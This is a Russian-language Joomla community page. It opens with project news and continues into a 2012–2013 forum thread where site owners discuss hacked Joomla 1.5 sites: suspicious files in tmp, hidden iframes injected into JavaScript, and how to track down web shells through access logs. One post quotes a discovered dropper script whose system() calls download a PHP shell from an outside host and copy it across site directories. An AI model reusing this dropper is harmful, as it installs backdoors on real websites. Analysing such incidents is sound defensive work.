Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 26 Ответов
  • 5925 Просмотров
*

apelsin

  • Захожу иногда
  • 129
  • 0 / 1
25 декабря в папке tmp появились файлы j.php и jos_core.php, в каком компоненте уязвимость? Joomla 1.5.25, сайт был ранее взломан через JCE, восстановил с бекапа и обновил версию JCE на последнюю.
*

maxpa

  • Захожу иногда
  • 67
  • 2 / 0
та же самая проблема. Хостер прислал письмо Malicious Files Detected on your Account со списком где файлы обнаружены. Везде в папке tmp
*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
apelsin, maxpa, обновитесь до 1.5.26. Список установленных компонентов?
Разработка, доработка расширений для Joomla!
*

maxpa

  • Захожу иногда
  • 67
  • 2 / 0
Версия Joomla 1.5.26
Установленные компоненты
Advanced Module Manager 2.4.2
Admintools   2.2.4   
Akeeba 3.4.3
JCE 2.3.1
PhocaMaps   1.1.2   
SeoBoss 1.4r3
SEO Boss Installation Bundle 1.4r3   
Xmap 1.2.11
*

apelsin

  • Захожу иногда
  • 129
  • 0 / 1
уязвимость в Advanced Module Manager старых версий была
*

svem

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
таже самая проблема

установлены

Версия Joomla 1.5.26
Установленные компоненты
Advanced Module Manager 2.4.2    February 2012 (вроде бы не сильно старая)    NoNumber! (Peter van Westen)  

как лечить?
« Последнее редактирование: 11.01.2013, 02:56:09 от svem »
*

maxpa

  • Захожу иногда
  • 67
  • 2 / 0
Вообщем что сделал я. Снес Advanced Module Manager и перетряс другие компоненты, модули и плагины на устарелость. Ненужные тоже посносил. Почистил папку tmp. Поставил Admin Tools от Akeeba. С ее помощью запаролил  админ-директорию, изменил префиксы в базах, сменил стандартную учетку админа, проставил разрешения на файлах и папках на хостинге. Естественно везде поменял пароли. Может это параноя, но мне так как то спокойнее)))
*

maxpa

  • Захожу иногда
  • 67
  • 2 / 0
Кому интересно продолжение истории - сегодня совершенно случайно на одном из своих сайтов (на нем файлик в папке tmp был удален самым последним) обнаружил код <iframe style="position:fixed;top:0px;left:-550px;" src="http://*********" height="90" width="90"></iframe> в куче .js файлов. Сижу чищу(((
*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
Разработка, доработка расширений для Joomla!
*

maxpa

  • Захожу иногда
  • 67
  • 2 / 0
Вычистить не удалось. Строка с кодом появляется снова. Дописывается в конце кода .js файла. Хостер тоже помочь ничем не смог. Хорошо, что был под рукой бэкап. Восстановил сайт из него.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
*

maxpa

  • Захожу иногда
  • 67
  • 2 / 0
Спасибо за наводку. Обязательно попробую при случае. Пока необходимость лечения, благодаря бэкапам, отпала.)
*

gillesderais

  • Новичок
  • 5
  • 0 / 0
maxpa

история один в один. включая js файлы. а какой у вас хостер, если не секрет?
*

maxpa

  • Захожу иногда
  • 67
  • 2 / 0
maxpa

история один в один. включая js файлы. а какой у вас хостер, если не секрет?
Хостинг webhostinghub.com, но думаю дело не в нем. Я где то тут уже писал - обнаружил на основном сайте аккаунта старые версии компонентов JCE и Advanced Module Manager, а в JCE как раз уязвимость есть. Видимо из-за них проблема распространилась на все сайты аккаунта. Единственное, в чем минус этого хостера - техподдержка по поводу  фрейма лишь развела руками, тогда как другой хостер (тоже американский) прислал на почту уведомление о подозрительных файлах, и даже сам все пофиксил без моего вмешательства.
*

gillesderais

  • Новичок
  • 5
  • 0 / 0
Могу огорчить, у меня такого нету. Но совпадает все, вплоть до дат и названий файлов. Среди других компонентов тоже нет совпадений, у меня таких нет. Advanced Module Manager тоже нет. А вот Joomla 1.5
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
если нет совпадения, то либо всетаки редактор JCE, либо другое расширение, и возможно версия движка ниже актуальной 1.5.26
если она до 1.5.22 это тоже не гуд
*

gillesderais

  • Новичок
  • 5
  • 0 / 0
человек вон пишет на 1.5.26 тоже самое. JCE редактора у меня вот нету.
*

era

  • Администратор
  • 1588
  • 392 / 5
  • В туалете лучше быть пользователем, чем админом.
как найти shell при повторном заражении:
1. смотрите время изменения вашего JS-файла (вплоть до секунды)
2. смотрите логи доступа апача - какие скрипты вызывались в эту секунду.

всё, то что в этот момент вызывалось - там и есть shell. Не подойдёт только для очень посещаемых ресурсов.
*

gillesderais

  • Новичок
  • 5
  • 0 / 0
ага, только ничего не помешает в дальнейшем залить шеллы заново, тк уязвимость осталась.
*

era

  • Администратор
  • 1588
  • 392 / 5
  • В туалете лучше быть пользователем, чем админом.
а вот когда зальют заново, то вы сможете узнать этим-же способом через что залили. Только вот так по цепочке....
если у вас конечно логи доступа не хранятся за пол года
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
человек вон пишет на 1.5.26 тоже самое. JCE редактора у меня вот нету.
может сайт не первый раз ломают
есть ошибка что раньше ни кто не писал про поиск и удаление утилит при подмени индексной страницы, все только её меняли назад и все, а shell остался у многих таких, но есть умельцы которые даже не ломают сайты просто пускают бота и он находит эти не удаленные утилиты (называю просто не дочистили)
не приходит ни кому мысль что shell могли и залить год два три назад, а сейчас бот нашел его и его сменили на другой или успешно старым воспользовались, и до этого не стояла у него версия 1.5.26(а после хоть заобновляйя если он там полеживает как на курорте), или есть соседние сайты через которые ломали, а сломав один сайт зальют во все соседние
про логи совет вам написали, но это как стандарт с чего надо начинать поиск(о нем и ни кто не упоминает потому что уверены что поиск ведется с их анализа), еще многие экономят, а хостеры ограничивают, !важно логи должны вестись максимально годами, минимум 60-90 дней
*

maxpa

  • Захожу иногда
  • 67
  • 2 / 0
Мне хостер опять прислал сообщение о подозрительных файлах в папке tmp.
Спойлер
[свернуть]

Хостер потер указанные в сообщении файлы в папке tmp. Я там нашел только j.php, который тут же удалил))На этот раз все подозрительные компоненты с сайта были удалены. Правда заметил один интересный момент. В папке plugins/editors лежал файлик JCE.php хотя сам компонент деинсталлирован с неделю назад. Дата создания файла 16.11.2012 в 2-37 в папках 4х разных сайтов. Может в нем причина?
*

_ib_

  • Давно я тут
  • 673
  • 100 / 8
2. смотрите логи доступа апача - какие скрипты вызывались в эту секунду.

до секунды- это лишнее, + не всегда так. Да, очень вероятно, что уязвимость была использована пару сек до создания этого файла или в туже секунду, но не факт, что этот файл залили сразу из дырочки, ведь могли из дырочки залить вэбшел сначала куда-то, а потом уже из него через час, день, неделю ... залить уже этот PHP в папку tmp.

человек вон пишет на 1.5.26 тоже самое. JCE редактора у меня вот нету.

хороший урок переходить с 1.5 на стабильную ветку Joomla + обновлять расширения постоянно!  С версии 2.5. для таких вот пользователй как раз сделали онлайн проверку версий и обновлений.

UPD: Era, надо такие темы в топку кидать, т.к. версия джумлы не поддерживаемая + пользователи в 99% случаев не имеют достаточного уровня для выявления дырки и её залатывания. Как считаешь?
« Последнее редактирование: 22.01.2013, 02:51:38 от _ib_ »
Легальные шаблоны и дёшево!  + скидки до 50% для шаблонов клуба Joomlart, RocketTheme, Yootheme и Gavick.

при интересе пишите в личку или на мыло: "p" точка "d" собака gmx.de
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9

Цитировать
UPD: Era, надо такие темы в топку кидать, т.к. версия Joomla не поддерживаемая + пользователи в 99% случаев не имеют достаточного уровня для выявления дырки и её залатывания. Как считаешь?

Я тоже считаю что надо завести одну тему прикрепить, а остальные вновь созданные темы в топку кидать а в той теме все случаи разбирать.

Цитировать
хороший урок переходить с 1.5 на стабильную ветку Joomla + обновлять расширения постоянно!  С версии 2.5. для таких вот пользователй как раз сделали онлайн проверку версий и обновлений.

извините конечно, но не актуальное заявление, и переход не поможет из опыта ломают и 2.5 еще и больше чем 1.5, а сайты даже на 1.0 если за ними следят и 1.5, есть множество случаев что не ломают

Если многие поддерживают, то раздел почищу и тему создам, прикрепим её и буду всех туда сливать.
*

gillesderais

  • Новичок
  • 5
  • 0 / 0
Ага, переходите на новые версии и все будет ок - странное заявление. Ладно, если еще один сайт, можно, раз уж это всегда утверждают. А если несколько штук, да еще двузначное число - никто не будет таким заниматься ради мнимой защиты новых версий.
*

KingSnake

  • Захожу иногда
  • 232
  • 0 / 1
Тоже нашел у себя эти два файлика :) Сайт на Joomla 1.5.26, стараюсь постоянно обновлять компоненты и модули. Но не это интересно, а следующее.

В папке images/stories лежал файлик add.php с интересным содержанием :)
Код
system("cd images; wget http://blog.ttgv.org.tr/wp-content/themes/default/x.txt; mv x.txt x.php; echo x>index.html");
system("cp ./images/x.php ../../tmp/w.php");
system("cp ./images/x.php ../../components/com_contact/views/w.php");
system("cp ./images/x.php ../../modules/mod_login/w.php");
system("cp ./image/x.php ../../administrator/components/com_contact/w.php");
system("cp ./images/x.php ../../includes/Archive/w.php");
system("cp ./images/x.php ../../includes/domit/w.php");

Все эти указанные файлы присутвовали в указанных папках. Только некоторые были под другими именами, но также из одной аглийской буквы и все пустые (смотрел через Notepad++). Вот такие вот плюшки :)
*

xspline

  • Осваиваюсь на форуме
  • 41
  • 2 / 0
на J 2.5.6. та же байда - от версии не зависит. Причём где получается с помощью удаления JCE и replace.php почистить, а где нет.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Заражены файлы картинок движка Joomla 3

Автор krog

Ответов: 5
Просмотров: 1995
Последний ответ 16.04.2021, 08:16:45
от Taatshi
PHP в режиме FastCGI и права на файлы

Автор cntrl

Ответов: 12
Просмотров: 1851
Последний ответ 08.09.2020, 13:45:10
от Septdir
Обнаружена уязвимость версий Joomla с 3.0.0 по 3.4.6

Автор vvc

Ответов: 8
Просмотров: 1683
Последний ответ 23.10.2019, 21:40:57
от dmitry_stas
Критическая уязвимость Exim ((cve-2019-10149.))

Автор yuri-it

Ответов: 20
Просмотров: 2182
Последний ответ 11.06.2019, 19:56:16
от Septdir
Хостинг оповестил что некоторые файлы вашего хостинга были изменены

Автор Элана

Ответов: 9
Просмотров: 1435
Последний ответ 15.01.2019, 18:54:28
от voland